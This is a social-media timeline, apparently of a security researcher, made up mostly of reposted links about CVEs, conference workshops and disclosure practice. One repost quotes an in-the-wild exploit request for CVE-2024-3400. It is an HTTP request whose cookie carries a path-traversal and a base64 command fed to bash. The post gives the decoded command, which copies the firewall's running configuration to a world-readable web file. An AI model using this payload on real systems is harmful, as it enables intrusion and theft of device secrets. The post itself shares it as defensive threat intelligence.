Posts
2172
Following
453
Followers
1080
A drunken debugger

Heretek of Silent Signal
repeated

Nice one! The usual clusterfuck LOLOL Not stripping Go binaries also a great idea LOLOLOl

https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

0
2
0
repeated

From hackinglz on the Nazi site:

Since it's out there now this is what I caught in wild CVE-2024-3400

GET /global-protect/login.esp HTTP/1.1 Host: X User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive Cookie: SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/`echo${IFS}dGFyIC1jemYgL3Zhci9hcHB3ZWIvc3NsdnBuZG9jcy9nbG9iYWwtcHJvdGVjdC9wb3J0YWwvanMvanF1ZXJ5Lm1heC5qcyAvb3B0L3BhbmNmZy9tZ210L3NhdmVkLWNvbmZpZ3MvcnVubmluZy1jb25maWcueG1s|base64${IFS}-d|bash${IFS}-i`

b64 decoded

tar -czf /var/appweb/sslvpndocs/global-protect/portal/js/jquery.max.js /opt/pancfg/mgmt/saved-configs/running-config.xml

Taring running config to world readable location in /global-protect/portal/js/jquery.max.js

1
5
0
[RSS] CVE-2024-2448: Authenticated Command Injection In Progress Kemp LoadMaster

https://rhinosecuritylabs.com/research/cve-2024-2448-kemp-loadmaster/
0
0
0
[RSS] Telegram Arbitrary Code Execution via InstantView | TeleSec

https://www.telesec.top/telesec/telegram-desktop/arbitrary-code-execution-via-instantview
0
0
1
repeated

MGM Resorts sued the FTC to stop an investigation into how it dealt with a cybersecurity attack last year

https://archive.ph/mXIDQ

0
2
0
Chaining N-days to Compromise All: Part 3 — Windows Driver LPE: Medium to System

(CVE-2023–29360)

https://blog.theori.io/chaining-n-days-to-compromise-all-part-3-windows-driver-lpe-medium-to-system-12f7821d97bb
0
1
1
repeated

COOL Days slides 3/4 Tips for debugging your text documents https://speakerdeck.com/vmiklos/tips-for-debugging-your-text-documents

0
1
0
[oss-security] CVE-2024-31497: Secret Key Recovery of NIST P-521 Private Keys Through Biased ECDSA Nonces in PuTTY Client

https://seclists.org/oss-sec/2024/q2/122
0
0
0
repeated

🦀 Hello, if you're coming to @NorthSec in Montréal this year (May 16-17), I'll be hosting a workshop there on reverse engineering Rust binaries! https://nsec.io/session/2024-reversing-rust-binaries-one-step-beyond-strings.html

This workshop uses one problem - string recovery from a Rust binary - and uses it as a starting point to explore some of the basics of reverse engineering Rust binaries. The goal is not to teach you all of Rust, but rather to give you some practical tips to use when facing your next Rust binary.

The intended audience is reverse engineers who are familiar with reversing C/C++ binaries, but who are unsure on how to reverse Rust! rust

0
3
0
[RSS] Analyzing the Code From The Terminator’s HUD

https://hackaday.com/2024/04/15/analyzing-the-code-from-the-terminators-hud/
0
0
0
repeated
repeated

So, Microsoft is silently installing Copilot onto Windows Server 2022 system and this is a disaster.

How can you push a tool that siphons data to a third party onto a security-critical system?

What privileges does it have upon install? Who thought this is a good idea? And most importantly, who needs this?

4
12
1
repeated

Streamline the process for white hats to report bugs in your projects. We outline our procedure for disclosing five previously unreported vulnerabilities using a basic security policy and GitHub's private reporting feature.
https://blog.trailofbits.com/2024/04/15/5-reasons-to-strive-for-better-disclosure-processes/

0
2
0
repeated
Edited yesterday

I was reminded of the great security fix of 2019

11
28
1
repeated

We’ve officially reached the stage of the LLM information crisis in which the normal 0-day lifecycle must now include a check against LLM-generated garbage.

Repos like this one will purport to be proofs-of-concept of new vulnerabilities, when in fact they are simply garbage code generated by a model. The README is also model-generated.

The motivations for this behavior are beyond me. Internet clout maybe? It’s unclear, but what is clear is that every new hot button vuln is going to come along with this kind of crap. It’s just making defenders’ jobs that much harder.

2
4
0
repeated

The Russian National Coordination Center for Computer Incidents (NKTsKI) has launched its own version of the Have I Been Pwned service: https://safe-surf.ru/specialists/news/706601/

The agency launched the service after Ukrainian hacktivists leaked the data of millions of Russians over the past two years.

The NKTsKI is a CERT-like organization created by the Russian Federal Security Service (FSB) in 2018. The service is available online here: https://chk.safe-surf.ru/

0
1
0
Show older